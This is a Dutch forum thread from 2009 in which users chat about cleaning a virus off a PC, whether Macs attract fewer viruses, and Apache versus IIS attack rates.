quote:Dat laatste is onzin.. Het marktaandeel EN het feit dat praktisch geen enkele mac gebruiker een virusscanner heeft draaien is de natte droom van iedere virusschrijver. Het is blijkbaar verrekte moeilijk. Want als de wet van de grote aantallen gaan gelden is het een raadsel waarom voorheen Appache op iets van 94% van de webservers geinstalleerd was toch minder last had van hackpogingen dan het veel minder gebruikte IIS van microsoft. Waarmee ik niet wil zeggen dat er nooit een virus voor een Mac ZAL komen, maar het is in ieder geval niet zo vanzelfsprekend als gedacht wordt. Anyway, in dit geval lag het probleem meer bij adobe dan windows natuurlijk. Nijdig virusje.... | ||
Re | donderdag 13 augustus 2009 @ 14:09 | |
quote:dat kan ongetwijfelt een reden zijn ja... aanschaffen weer nieuwe software is een tweede ![]() | ||
Dizer | donderdag 13 augustus 2009 @ 14:10 | |
quote:Wehehehe.... nieuwe software... wheheheheheheeh ![]() Je kent mij toch? En de rest is GRATIS want veel open source dingen ![]() | ||
MissBliss | donderdag 13 augustus 2009 @ 14:31 | |
Dit is geen pc vs. Mac-topic! Doe dat maar ergens anders ![]() Virus is weg en zóveel moeite heeft het nou ook weer niet gekost hoor. Ik heb dinsdag een stuk of 5 virusscans gedraaid, maar dat is natuurlijk alleen een kwestie van op een knopje klikken en de rest gaat vanzelf. Een clean instal kost meer moeite ![]() | ||
Swetsenegger | donderdag 13 augustus 2009 @ 16:26 | |
Je bent een hele dag bezig geweest ![]() Nee kost weinig moeite, een dag productie kwijt. | ||
MissBliss | donderdag 13 augustus 2009 @ 16:30 | |
Ik zat toch thuis achter de pc (ik had vrij dinsdag). | ||
An24 | donderdag 13 augustus 2009 @ 20:05 | |
quote:Dat bedenk ik me dus ook (nog steeds ftp niet aangeraakt, macje komt maandag ![]() |